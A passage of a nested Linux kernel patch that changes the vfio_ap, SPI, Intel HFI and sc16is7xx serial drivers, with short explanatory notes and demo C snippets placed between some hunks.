+-	set_bit_inv(apqi, aqm_delta);
+ 
+-	if (vfio_ap_mdev_filter_matrix(matrix_mdev->matrix.apm, aqm_delta,
+-				       matrix_mdev))
++	if (vfio_ap_mdev_filter_matrix(matrix_mdev))
+ 		vfio_ap_mdev_update_guest_apcb(matrix_mdev);
+ 
+ 	ret = count;
+@@ -1858,11 +1851,22 @@ int vfio_ap_mdev_probe_queue(struct ap_device *apdev)
+ 	if (matrix_mdev) {
+ 		vfio_ap_mdev_link_queue(matrix_mdev, q);
+ 
+-		if (vfio_ap_mdev_filter_matrix(matrix_mdev->matrix.apm,
+-					       matrix_mdev->matrix.aqm,
+-					       matrix_mdev))
++		/*
++		 * If we're in the process of handling the adding of adapters or
++		 * domains to the host's AP configuration, then let the
++		 * vfio_ap device driver's on_scan_complete callback filter the
++		 * matrix and update the guest's AP configuration after all of
++		 * the new queue devices are probed.
++		 */
++		if (!bitmap_empty(matrix_mdev->apm_add, AP_DEVICES) ||
++		    !bitmap_empty(matrix_mdev->aqm_add, AP_DOMAINS))
++			goto done;
++
++		if (vfio_ap_mdev_filter_matrix(matrix_mdev))
+ 			vfio_ap_mdev_update_guest_apcb(matrix_mdev);
+ 	}
++
++done:
+ 	dev_set_drvdata(&apdev->device, q);
+ 	release_update_locks_for_mdev(matrix_mdev);
+ 
+@@ -2211,34 +2215,22 @@ void vfio_ap_on_cfg_changed(struct ap_config_info *cur_cfg_info,
+ 
+ static void vfio_ap_mdev_hot_plug_cfg(struct ap_matrix_mdev *matrix_mdev)
+ {
+-	bool do_hotplug = false;
+-	int filter_domains = 0;
+-	int filter_adapters = 0;
+-	DECLARE_BITMAP(apm, AP_DEVICES);
+-	DECLARE_BITMAP(aqm, AP_DOMAINS);
++	bool filter_domains, filter_adapters, filter_cdoms, do_hotplug = false;
+ 
+ 	mutex_lock(&matrix_mdev->kvm->lock);
+ 	mutex_lock(&matrix_dev->mdevs_lock);
+ 
+-	filter_adapters = bitmap_and(apm, matrix_mdev->matrix.apm,
+-				     matrix_mdev->apm_add, AP_DEVICES);
+-	filter_domains = bitmap_and(aqm, matrix_mdev->matrix.aqm,
+-				    matrix_mdev->aqm_add, AP_DOMAINS);
+-
+-	if (filter_adapters && filter_domains)
+-		do_hotplug |= vfio_ap_mdev_filter_matrix(apm, aqm, matrix_mdev);
+-	else if (filter_adapters)
+-		do_hotplug |=
+-			vfio_ap_mdev_filter_matrix(apm,
+-						   matrix_mdev->shadow_apcb.aqm,
+-						   matrix_mdev);
+-	else
+-		do_hotplug |=
+-			vfio_ap_mdev_filter_matrix(matrix_mdev->shadow_apcb.apm,
+-						   aqm, matrix_mdev);
++	filter_adapters = bitmap_intersects(matrix_mdev->matrix.apm,
++					    matrix_mdev->apm_add, AP_DEVICES);
++	filter_domains = bitmap_intersects(matrix_mdev->matrix.aqm,
++					   matrix_mdev->aqm_add, AP_DOMAINS);
++	filter_cdoms = bitmap_intersects(matrix_mdev->matrix.adm,
++					 matrix_mdev->adm_add, AP_DOMAINS);
++
++	if (filter_adapters || filter_domains)
++		do_hotplug = vfio_ap_mdev_filter_matrix(matrix_mdev);
+ 
+-	if (bitmap_intersects(matrix_mdev->matrix.adm, matrix_mdev->adm_add,
+-			      AP_DOMAINS))
++	if (filter_cdoms)
+ 		do_hotplug |= vfio_ap_mdev_filter_cdoms(matrix_mdev);
+ 
+ 	if (do_hotplug)
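bitmap_intersects() replaces the earlier bitmap_and()-into-a-temporary pattern: it answers whether two masks share any set bit without materializing the intersection. A minimal sketch of the semantics:

    #include <linux/bitmap.h>

    static bool demo_masks_overlap(void)
    {
    	DECLARE_BITMAP(a, 64);
    	DECLARE_BITMAP(b, 64);

    	bitmap_zero(a, 64);
    	bitmap_zero(b, 64);
    	__set_bit(3, a);
    	__set_bit(3, b);

    	/*
    	 * True: bit 3 is set in both. No destination bitmap is needed,
    	 * unlike bitmap_and(dst, a, b, 64) followed by an emptiness test.
    	 */
    	return bitmap_intersects(a, b, 64);
    }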
+diff --git a/drivers/spi/spi-bcm-qspi.c b/drivers/spi/spi-bcm-qspi.c
+index 137e7315a3cfd..b24955910147c 100644
+--- a/drivers/spi/spi-bcm-qspi.c
++++ b/drivers/spi/spi-bcm-qspi.c
+@@ -19,7 +19,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/slab.h>
+ #include <linux/spi/spi.h>
+-#include <linux/spi/spi-mem.h>
++#include <linux/mtd/spi-nor.h>
+ #include <linux/sysfs.h>
+ #include <linux/types.h>
+ #include "spi-bcm-qspi.h"
+@@ -1221,7 +1221,7 @@ static int bcm_qspi_exec_mem_op(struct spi_mem *mem,
+ 
+ 	/* non-aligned and very short transfers are handled by MSPI */
+ 	if (!IS_ALIGNED((uintptr_t)addr, 4) || !IS_ALIGNED((uintptr_t)buf, 4) ||
+-	    len < 4)
++	    len < 4 || op->cmd.opcode == SPINOR_OP_RDSFDP)
+ 		mspi_read = true;
+ 
+ 	if (!has_bspi(qspi) || mspi_read)
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 22d227878bc44..19688f333e0bc 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -1636,6 +1636,10 @@ static int __spi_pump_transfer_message(struct spi_controller *ctlr,
+ 			pm_runtime_put_noidle(ctlr->dev.parent);
+ 			dev_err(&ctlr->dev, "Failed to power device: %d\n",
+ 				ret);
++
++			msg->status = ret;
++			spi_finalize_current_message(ctlr);
++
+ 			return ret;
+ 		}
+ 	}
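The two added lines enforce an invariant of the message queue: once a message has been dequeued, every exit path must set its status and finalize it, or a caller blocked in spi_sync() never wakes up. A simplified sketch of the error-path rule, not the full __spi_pump_transfer_message():

    #include <linux/spi/spi.h>

    static int demo_fail_dequeued_message(struct spi_controller *ctlr,
    				      struct spi_message *msg, int err)
    {
    	/* Record the failure and complete the message before bailing out. */
    	msg->status = err;
    	spi_finalize_current_message(ctlr);

    	return err;
    }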
+diff --git a/drivers/thermal/intel/intel_hfi.c b/drivers/thermal/intel/intel_hfi.c
+index a0640f762dc5d..750dab3f259e4 100644
+--- a/drivers/thermal/intel/intel_hfi.c
++++ b/drivers/thermal/intel/intel_hfi.c
+@@ -24,6 +24,7 @@
+ #include <linux/bitops.h>
+ #include <linux/cpufeature.h>
+ #include <linux/cpumask.h>
++#include <linux/delay.h>
+ #include <linux/gfp.h>
+ #include <linux/io.h>
+ #include <linux/kernel.h>
+@@ -34,7 +35,9 @@
+ #include <linux/processor.h>
+ #include <linux/slab.h>
+ #include <linux/spinlock.h>
++#include <linux/suspend.h>
+ #include <linux/string.h>
++#include <linux/syscore_ops.h>
+ #include <linux/topology.h>
+ #include <linux/workqueue.h>
+ 
+@@ -338,6 +341,52 @@ static void init_hfi_instance(struct hfi_instance *hfi_instance)
+ 	hfi_instance->data = hfi_instance->hdr + hfi_features.hdr_size;
+ }
+ 
++/* Caller must hold hfi_instance_lock. */
++static void hfi_enable(void)
++{
++	u64 msr_val;
++
++	rdmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
++	msr_val |= HW_FEEDBACK_CONFIG_HFI_ENABLE_BIT;
++	wrmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
++}
++
++static void hfi_set_hw_table(struct hfi_instance *hfi_instance)
++{
++	phys_addr_t hw_table_pa;
++	u64 msr_val;
++
++	hw_table_pa = virt_to_phys(hfi_instance->hw_table);
++	msr_val = hw_table_pa | HW_FEEDBACK_PTR_VALID_BIT;
++	wrmsrl(MSR_IA32_HW_FEEDBACK_PTR, msr_val);
++}
++
++/* Caller must hold hfi_instance_lock. */
++static void hfi_disable(void)
++{
++	u64 msr_val;
++	int i;
++
++	rdmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
++	msr_val &= ~HW_FEEDBACK_CONFIG_HFI_ENABLE_BIT;
++	wrmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
++
++	/*
++	 * Wait for hardware to acknowledge the disabling of HFI. Some
++	 * processors may not do it. Wait for ~2ms. This is a reasonable
++	 * time for hardware to complete any pending actions on the HFI
++	 * memory.
++	 */
++	for (i = 0; i < 2000; i++) {
++		rdmsrl(MSR_IA32_PACKAGE_THERM_STATUS, msr_val);
++		if (msr_val & PACKAGE_THERM_STATUS_HFI_UPDATED)
++			break;
++
++		udelay(1);
++		cpu_relax();
++	}
++}
++
+ /**
+  * intel_hfi_online() - Enable HFI on @cpu
+  * @cpu:	CPU in which the HFI will be enabled
+@@ -355,8 +404,6 @@ void intel_hfi_online(unsigned int cpu)
+ {
+ 	struct hfi_instance *hfi_instance;
+ 	struct hfi_cpu_info *info;
+-	phys_addr_t hw_table_pa;
+-	u64 msr_val;
+ 	u16 die_id;
+ 
+ 	/* Nothing to do if hfi_instances are missing. */
+@@ -394,14 +441,16 @@ void intel_hfi_online(unsigned int cpu)
+ 	/*
+ 	 * Hardware is programmed with the physical address of the first page
+ 	 * frame of the table. Hence, the allocated memory must be page-aligned.
++	 *
++	 * Some processors do not forget the initial address of the HFI table
++	 * even after having been reprogrammed. Keep using the same pages. Do
++	 * not free them.
+ 	 */
+ 	hfi_instance->hw_table = alloc_pages_exact(hfi_features.nr_table_pages,
+ 						   GFP_KERNEL | __GFP_ZERO);
+ 	if (!hfi_instance->hw_table)
+ 		goto unlock;
+ 
+-	hw_table_pa = virt_to_phys(hfi_instance->hw_table);
+-
+ 	/*
+ 	 * Allocate memory to keep a local copy of the table that
+ 	 * hardware generates.
+@@ -411,16 +460,6 @@ void intel_hfi_online(unsigned int cpu)
+ 	if (!hfi_instance->local_table)
+ 		goto free_hw_table;
+ 
+-	/*
+-	 * Program the address of the feedback table of this die/package. On
+-	 * some processors, hardware remembers the old address of the HFI table
+-	 * even after having been reprogrammed and re-enabled. Thus, do not free
+-	 * the pages allocated for the table or reprogram the hardware with a
+-	 * new base address. Namely, program the hardware only once.
+-	 */
+-	msr_val = hw_table_pa | HW_FEEDBACK_PTR_VALID_BIT;
+-	wrmsrl(MSR_IA32_HW_FEEDBACK_PTR, msr_val);
+-
+ 	init_hfi_instance(hfi_instance);
+ 
+ 	INIT_DELAYED_WORK(&hfi_instance->update_work, hfi_update_work_fn);
+@@ -429,13 +468,8 @@ void intel_hfi_online(unsigned int cpu)
+ 
+ 	cpumask_set_cpu(cpu, hfi_instance->cpus);
+ 
+-	/*
+-	 * Enable the hardware feedback interface and never disable it. See
+-	 * comment on programming the address of the table.
+-	 */
+-	rdmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
+-	msr_val |= HW_FEEDBACK_CONFIG_HFI_ENABLE_BIT;
+-	wrmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
++	hfi_set_hw_table(hfi_instance);
++	hfi_enable();
+ 
+ unlock:
+ 	mutex_unlock(&hfi_instance_lock);
+@@ -475,6 +509,10 @@ void intel_hfi_offline(unsigned int cpu)
+ 
+ 	mutex_lock(&hfi_instance_lock);
+ 	cpumask_clear_cpu(cpu, hfi_instance->cpus);
++
++	if (!cpumask_weight(hfi_instance->cpus))
++		hfi_disable();
++
+ 	mutex_unlock(&hfi_instance_lock);
+ }
+ 
+@@ -523,6 +561,30 @@ static __init int hfi_parse_features(void)
+ 	return 0;
+ }
+ 
++static void hfi_do_enable(void)
++{
++	/* This code runs only on the boot CPU. */
++	struct hfi_cpu_info *info = &per_cpu(hfi_cpu_info, 0);
++	struct hfi_instance *hfi_instance = info->hfi_instance;
++
++	/* No locking needed. There is no concurrency with CPU online. */
++	hfi_set_hw_table(hfi_instance);
++	hfi_enable();
++}
++
++static int hfi_do_disable(void)
++{
++	/* No locking needed. There is no concurrency with CPU offline. */
++	hfi_disable();
++
++	return 0;
++}
++
++static struct syscore_ops hfi_pm_ops = {
++	.resume = hfi_do_enable,
++	.suspend = hfi_do_disable,
++};
++
+ void __init intel_hfi_init(void)
+ {
+ 	struct hfi_instance *hfi_instance;
+@@ -554,6 +616,8 @@ void __init intel_hfi_init(void)
+ 	if (!hfi_updates_wq)
+ 		goto err_nomem;
+ 
++	register_syscore_ops(&hfi_pm_ops);
++
+ 	return;
+ 
+ err_nomem:
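The syscore callbacks can skip locking because they run late in suspend and early in resume, on the boot CPU alone, with the other CPUs already offline. A minimal registration sketch following the same pattern (demo names are illustrative):

    #include <linux/syscore_ops.h>

    static int demo_suspend(void)
    {
    	/* Runs on the boot CPU only; disable the hardware feature here. */
    	return 0;
    }

    static void demo_resume(void)
    {
    	/* Reprogram and re-enable the feature on resume. */
    }

    static struct syscore_ops demo_syscore_ops = {
    	.suspend = demo_suspend,
    	.resume  = demo_resume,
    };

    static int __init demo_init(void)
    {
    	register_syscore_ops(&demo_syscore_ops);
    	return 0;
    }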
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index db33790e66754..e331b57d6d7d3 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -301,8 +301,8 @@
+ 
+ 
+ /* Misc definitions */
++#define SC16IS7XX_SPI_READ_BIT		BIT(7)
+ #define SC16IS7XX_FIFO_SIZE		(64)
+-#define SC16IS7XX_REG_SHIFT		2
+ #define SC16IS7XX_GPIOS_PER_BANK	4
+ 
+ struct sc16is7xx_devtype {
+@@ -323,7 +323,8 @@ struct sc16is7xx_one_config {
+ 
+ struct sc16is7xx_one {
+ 	struct uart_port		port;
+-	u8				line;
++	struct regmap			*regmap;
++	struct mutex			efr_lock; /* EFR registers access */
+ 	struct kthread_work		tx_work;
+ 	struct kthread_work		reg_work;
+ 	struct kthread_delayed_work	ms_work;
+@@ -334,7 +335,6 @@ struct sc16is7xx_one {
+ 
+ struct sc16is7xx_port {
+ 	const struct sc16is7xx_devtype	*devtype;
+-	struct regmap			*regmap;
+ 	struct clk			*clk;
+ #ifdef CONFIG_GPIOLIB
+ 	struct gpio_chip		gpio;
+@@ -344,7 +344,6 @@ struct sc16is7xx_port {
+ 	unsigned char			buf[SC16IS7XX_FIFO_SIZE];
+ 	struct kthread_worker		kworker;
+ 	struct task_struct		*kworker_task;
+-	struct mutex			efr_lock;
+ 	struct sc16is7xx_one		p[];
+ };
+ 
+@@ -362,48 +361,35 @@ static void sc16is7xx_stop_tx(struct uart_port *port);
+ #define to_sc16is7xx_port(p,e)	((container_of((p), struct sc16is7xx_port, e)))
+ #define to_sc16is7xx_one(p,e)	((container_of((p), struct sc16is7xx_one, e)))
+ 
+-static int sc16is7xx_line(struct uart_port *port)
+-{
+-	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+-
+-	return one->line;
+-}
+-
+ static u8 sc16is7xx_port_read(struct uart_port *port, u8 reg)
+ {
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 	unsigned int val = 0;
+-	const u8 line = sc16is7xx_line(port);
+ 
+-	regmap_read(s->regmap, (reg << SC16IS7XX_REG_SHIFT) | line, &val);
++	regmap_read(one->regmap, reg, &val);
+ 
+ 	return val;
+ }
+ 
+ static void sc16is7xx_port_write(struct uart_port *port, u8 reg, u8 val)
+ {
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+-	const u8 line = sc16is7xx_line(port);
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+-	regmap_write(s->regmap, (reg << SC16IS7XX_REG_SHIFT) | line, val);
++	regmap_write(one->regmap, reg, val);
+ }
+ 
+ static void sc16is7xx_fifo_read(struct uart_port *port, unsigned int rxlen)
+ {
+ 	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+-	const u8 line = sc16is7xx_line(port);
+-	u8 addr = (SC16IS7XX_RHR_REG << SC16IS7XX_REG_SHIFT) | line;
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+-	regcache_cache_bypass(s->regmap, true);
+-	regmap_raw_read(s->regmap, addr, s->buf, rxlen);
+-	regcache_cache_bypass(s->regmap, false);
++	regmap_noinc_read(one->regmap, SC16IS7XX_RHR_REG, s->buf, rxlen);
+ }
+ 
+ static void sc16is7xx_fifo_write(struct uart_port *port, u8 to_send)
+ {
+ 	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+-	const u8 line = sc16is7xx_line(port);
+-	u8 addr = (SC16IS7XX_THR_REG << SC16IS7XX_REG_SHIFT) | line;
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+ 	/*
+ 	 * Don't send zero-length data, at least on SPI it confuses the chip
+@@ -412,32 +398,15 @@ static void sc16is7xx_fifo_write(struct uart_port *port, u8 to_send)
+ 	if (unlikely(!to_send))
+ 		return;
+ 
+-	regcache_cache_bypass(s->regmap, true);
+-	regmap_raw_write(s->regmap, addr, s->buf, to_send);
+-	regcache_cache_bypass(s->regmap, false);
++	regmap_noinc_write(one->regmap, SC16IS7XX_THR_REG, s->buf, to_send);
+ }
+ 
+ static void sc16is7xx_port_update(struct uart_port *port, u8 reg,
+ 				  u8 mask, u8 val)
+ {
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+-	const u8 line = sc16is7xx_line(port);
+-
+-	regmap_update_bits(s->regmap, (reg << SC16IS7XX_REG_SHIFT) | line,
+-			   mask, val);
+-}
+-
+-static int sc16is7xx_alloc_line(void)
+-{
+-	int i;
+-
+-	BUILD_BUG_ON(SC16IS7XX_MAX_DEVS > BITS_PER_LONG);
+-
+-	for (i = 0; i < SC16IS7XX_MAX_DEVS; i++)
+-		if (!test_and_set_bit(i, &sc16is7xx_lines))
+-			break;
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+-	return i;
++	regmap_update_bits(one->regmap, reg, mask, val);
+ }
+ 
+ static void sc16is7xx_power(struct uart_port *port, int on)
+@@ -479,7 +448,7 @@ static const struct sc16is7xx_devtype sc16is762_devtype = {
+ 
+ static bool sc16is7xx_regmap_volatile(struct device *dev, unsigned int reg)
+ {
+-	switch (reg >> SC16IS7XX_REG_SHIFT) {
++	switch (reg) {
+ 	case SC16IS7XX_RHR_REG:
+ 	case SC16IS7XX_IIR_REG:
+ 	case SC16IS7XX_LSR_REG:
+@@ -498,7 +467,7 @@ static bool sc16is7xx_regmap_volatile(struct device *dev, unsigned int reg)
+ 
+ static bool sc16is7xx_regmap_precious(struct device *dev, unsigned int reg)
+ {
+-	switch (reg >> SC16IS7XX_REG_SHIFT) {
++	switch (reg) {
+ 	case SC16IS7XX_RHR_REG:
+ 		return true;
+ 	default:
+@@ -508,9 +477,14 @@ static bool sc16is7xx_regmap_precious(struct device *dev, unsigned int reg)
+ 	return false;
+ }
+ 
++static bool sc16is7xx_regmap_noinc(struct device *dev, unsigned int reg)
++{
++	return reg == SC16IS7XX_RHR_REG;
++}
++
+ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ {
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 	u8 lcr;
+ 	u8 prescaler = 0;
+ 	unsigned long clk = port->uartclk, div = clk / 16 / baud;
+@@ -533,7 +507,7 @@ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ 	 * because the bulk of the interrupt processing is run as a workqueue
+ 	 * job in thread context.
+ 	 */
+-	mutex_lock(&s->efr_lock);
++	mutex_lock(&one->efr_lock);
+ 
+ 	lcr = sc16is7xx_port_read(port, SC16IS7XX_LCR_REG);
+ 
+@@ -542,17 +516,17 @@ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ 			     SC16IS7XX_LCR_CONF_MODE_B);
+ 
+ 	/* Enable enhanced features */
+-	regcache_cache_bypass(s->regmap, true);
++	regcache_cache_bypass(one->regmap, true);
+ 	sc16is7xx_port_update(port, SC16IS7XX_EFR_REG,
+ 			      SC16IS7XX_EFR_ENABLE_BIT,
+ 			      SC16IS7XX_EFR_ENABLE_BIT);
+ 
+-	regcache_cache_bypass(s->regmap, false);
++	regcache_cache_bypass(one->regmap, false);
+ 
+ 	/* Put LCR back to the normal mode */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG, lcr);
+ 
+-	mutex_unlock(&s->efr_lock);
++	mutex_unlock(&one->efr_lock);
+ 
+ 	sc16is7xx_port_update(port, SC16IS7XX_MCR_REG,
+ 			      SC16IS7XX_MCR_CLKSEL_BIT,
+@@ -563,10 +537,10 @@ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ 			     SC16IS7XX_LCR_CONF_MODE_A);
+ 
+ 	/* Write the new divisor */
+-	regcache_cache_bypass(s->regmap, true);
++	regcache_cache_bypass(one->regmap, true);
+ 	sc16is7xx_port_write(port, SC16IS7XX_DLH_REG, div / 256);
+ 	sc16is7xx_port_write(port, SC16IS7XX_DLL_REG, div % 256);
+-	regcache_cache_bypass(s->regmap, false);
++	regcache_cache_bypass(one->regmap, false);
+ 
+ 	/* Put LCR back to the normal mode */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG, lcr);
+@@ -667,9 +641,9 @@ static void sc16is7xx_handle_tx(struct uart_port *port)
+ 	}
+ 
+ 	if (uart_circ_empty(xmit) || uart_tx_stopped(port)) {
+-		spin_lock_irqsave(&port->lock, flags);
++		uart_port_lock_irqsave(port, &flags);
+ 		sc16is7xx_stop_tx(port);
+-		spin_unlock_irqrestore(&port->lock, flags);
++		uart_port_unlock_irqrestore(port, flags);
+ 		return;
+ 	}
+ 
+@@ -698,13 +672,15 @@ static void sc16is7xx_handle_tx(struct uart_port *port)
+ 		sc16is7xx_fifo_write(port, to_send);
+ 	}
+ 
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 	if (uart_circ_chars_pending(xmit) < WAKEUP_CHARS)
+ 		uart_write_wakeup(port);
+ 
+ 	if (uart_circ_empty(xmit))
+ 		sc16is7xx_stop_tx(port);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	else
++		sc16is7xx_ier_set(port, SC16IS7XX_IER_THRI_BIT);
++	uart_port_unlock_irqrestore(port, flags);
+ }
+ 
+ static unsigned int sc16is7xx_get_hwmctrl(struct uart_port *port)
+@@ -722,11 +698,10 @@ static unsigned int sc16is7xx_get_hwmctrl(struct uart_port *port)
+ static void sc16is7xx_update_mlines(struct sc16is7xx_one *one)
+ {
+ 	struct uart_port *port = &one->port;
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+ 	unsigned long flags;
+ 	unsigned int status, changed;
+ 
+-	lockdep_assert_held_once(&s->efr_lock);
++	lockdep_assert_held_once(&one->efr_lock);
+ 
+ 	status = sc16is7xx_get_hwmctrl(port);
+ 	changed = status ^ one->old_mctrl;
+@@ -736,7 +711,7 @@ static void sc16is7xx_update_mlines(struct sc16is7xx_one *one)
+ 
+ 	one->old_mctrl = status;
+ 
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 	if ((changed & TIOCM_RNG) && (status & TIOCM_RNG))
+ 		port->icount.rng++;
+ 	if (changed & TIOCM_DSR)
+@@ -747,79 +722,82 @@ static void sc16is7xx_update_mlines(struct sc16is7xx_one *one)
+ 		uart_handle_cts_change(port, status & TIOCM_CTS);
+ 
+ 	wake_up_interruptible(&port->state->port.delta_msr_wait);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	uart_port_unlock_irqrestore(port, flags);
+ }
+ 
+ static bool sc16is7xx_port_irq(struct sc16is7xx_port *s, int portno)
+ {
++	bool rc = true;
++	unsigned int iir, rxlen;
+ 	struct uart_port *port = &s->p[portno].port;
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+-	do {
+-		unsigned int iir, rxlen;
+-		struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+-
+-		iir = sc16is7xx_port_read(port, SC16IS7XX_IIR_REG);
+-		if (iir & SC16IS7XX_IIR_NO_INT_BIT)
+-			return false;
+-
+-		iir &= SC16IS7XX_IIR_ID_MASK;
+-
+-		switch (iir) {
+-		case SC16IS7XX_IIR_RDI_SRC:
+-		case SC16IS7XX_IIR_RLSE_SRC:
+-		case SC16IS7XX_IIR_RTOI_SRC:
+-		case SC16IS7XX_IIR_XOFFI_SRC:
+-			rxlen = sc16is7xx_port_read(port, SC16IS7XX_RXLVL_REG);
+-
+-			/*
+-			 * There is a silicon bug that makes the chip report a
+-			 * time-out interrupt but no data in the FIFO. This is
+-			 * described in errata section 18.1.4.
+-			 *
+-			 * When this happens, read one byte from the FIFO to
+-			 * clear the interrupt.
+-			 */
+-			if (iir == SC16IS7XX_IIR_RTOI_SRC && !rxlen)
+-				rxlen = 1;
+-
+-			if (rxlen)
+-				sc16is7xx_handle_rx(port, rxlen, iir);
+-			break;
++	mutex_lock(&one->efr_lock);
++
++	iir = sc16is7xx_port_read(port, SC16IS7XX_IIR_REG);
++	if (iir & SC16IS7XX_IIR_NO_INT_BIT) {
++		rc = false;
++		goto out_port_irq;
++	}
++
++	iir &= SC16IS7XX_IIR_ID_MASK;
++
++	switch (iir) {
++	case SC16IS7XX_IIR_RDI_SRC:
++	case SC16IS7XX_IIR_RLSE_SRC:
++	case SC16IS7XX_IIR_RTOI_SRC:
++	case SC16IS7XX_IIR_XOFFI_SRC:
++		rxlen = sc16is7xx_port_read(port, SC16IS7XX_RXLVL_REG);
++
++		/*
++		 * There is a silicon bug that makes the chip report a
++		 * time-out interrupt but no data in the FIFO. This is
++		 * described in errata section 18.1.4.
++		 *
++		 * When this happens, read one byte from the FIFO to
++		 * clear the interrupt.
++		 */
++		if (iir == SC16IS7XX_IIR_RTOI_SRC && !rxlen)
++			rxlen = 1;
++
++		if (rxlen)
++			sc16is7xx_handle_rx(port, rxlen, iir);
++		break;
+ 		/* CTSRTS interrupt comes only when CTS goes inactive */
+-		case SC16IS7XX_IIR_CTSRTS_SRC:
+-		case SC16IS7XX_IIR_MSI_SRC:
+-			sc16is7xx_update_mlines(one);
+-			break;
+-		case SC16IS7XX_IIR_THRI_SRC:
+-			sc16is7xx_handle_tx(port);
+-			break;
+-		default:
+-			dev_err_ratelimited(port->dev,
+-					    "ttySC%i: Unexpected interrupt: %x",
+-					    port->line, iir);
+-			break;
+-		}
+-	} while (0);
+-	return true;
++	case SC16IS7XX_IIR_CTSRTS_SRC:
++	case SC16IS7XX_IIR_MSI_SRC:
++		sc16is7xx_update_mlines(one);
++		break;
++	case SC16IS7XX_IIR_THRI_SRC:
++		sc16is7xx_handle_tx(port);
++		break;
++	default:
++		dev_err_ratelimited(port->dev,
++				    "ttySC%i: Unexpected interrupt: %x",
++				    port->line, iir);
++		break;
++	}
++
++out_port_irq:
++	mutex_unlock(&one->efr_lock);
++
++	return rc;
+ }
+ 
+ static irqreturn_t sc16is7xx_irq(int irq, void *dev_id)
+ {
+-	struct sc16is7xx_port *s = (struct sc16is7xx_port *)dev_id;
++	bool keep_polling;
+ 
+-	mutex_lock(&s->efr_lock);
++	struct sc16is7xx_port *s = (struct sc16is7xx_port *)dev_id;
+ 
+-	while (1) {
+-		bool keep_polling = false;
++	do {
+ 		int i;
+ 
++		keep_polling = false;
++
+ 		for (i = 0; i < s->devtype->nr_uart; ++i)
+ 			keep_polling |= sc16is7xx_port_irq(s, i);
+-		if (!keep_polling)
+-			break;
+-	}
+-
+-	mutex_unlock(&s->efr_lock);
++	} while (keep_polling);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -827,20 +805,15 @@ static irqreturn_t sc16is7xx_irq(int irq, void *dev_id)
+ static void sc16is7xx_tx_proc(struct kthread_work *ws)
+ {
+ 	struct uart_port *port = &(to_sc16is7xx_one(ws, tx_work)->port);
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+-	unsigned long flags;
++	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 
+ 	if ((port->rs485.flags & SER_RS485_ENABLED) &&
+ 	    (port->rs485.delay_rts_before_send > 0))
+ 		msleep(port->rs485.delay_rts_before_send);
+ 
+-	mutex_lock(&s->efr_lock);
++	mutex_lock(&one->efr_lock);
+ 	sc16is7xx_handle_tx(port);
+-	mutex_unlock(&s->efr_lock);
+-
+-	spin_lock_irqsave(&port->lock, flags);
+-	sc16is7xx_ier_set(port, SC16IS7XX_IER_THRI_BIT);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	mutex_unlock(&one->efr_lock);
+ }
+ 
+ static void sc16is7xx_reconf_rs485(struct uart_port *port)
+@@ -851,14 +824,14 @@ static void sc16is7xx_reconf_rs485(struct uart_port *port)
+ 	struct serial_rs485 *rs485 = &port->rs485;
+ 	unsigned long irqflags;
+ 
+-	spin_lock_irqsave(&port->lock, irqflags);
++	uart_port_lock_irqsave(port, &irqflags);
+ 	if (rs485->flags & SER_RS485_ENABLED) {
+ 		efcr |=	SC16IS7XX_EFCR_AUTO_RS485_BIT;
+ 
+ 		if (rs485->flags & SER_RS485_RTS_AFTER_SEND)
+ 			efcr |= SC16IS7XX_EFCR_RTS_INVERT_BIT;
+ 	}
+-	spin_unlock_irqrestore(&port->lock, irqflags);
++	uart_port_unlock_irqrestore(port, irqflags);
+ 
+ 	sc16is7xx_port_update(port, SC16IS7XX_EFCR_REG, mask, efcr);
+ }
+@@ -869,10 +842,10 @@ static void sc16is7xx_reg_proc(struct kthread_work *ws)
+ 	struct sc16is7xx_one_config config;
+ 	unsigned long irqflags;
+ 
+-	spin_lock_irqsave(&one->port.lock, irqflags);
++	uart_port_lock_irqsave(&one->port, &irqflags);
+ 	config = one->config;
+ 	memset(&one->config, 0, sizeof(one->config));
+-	spin_unlock_irqrestore(&one->port.lock, irqflags);
++	uart_port_unlock_irqrestore(&one->port, irqflags);
+ 
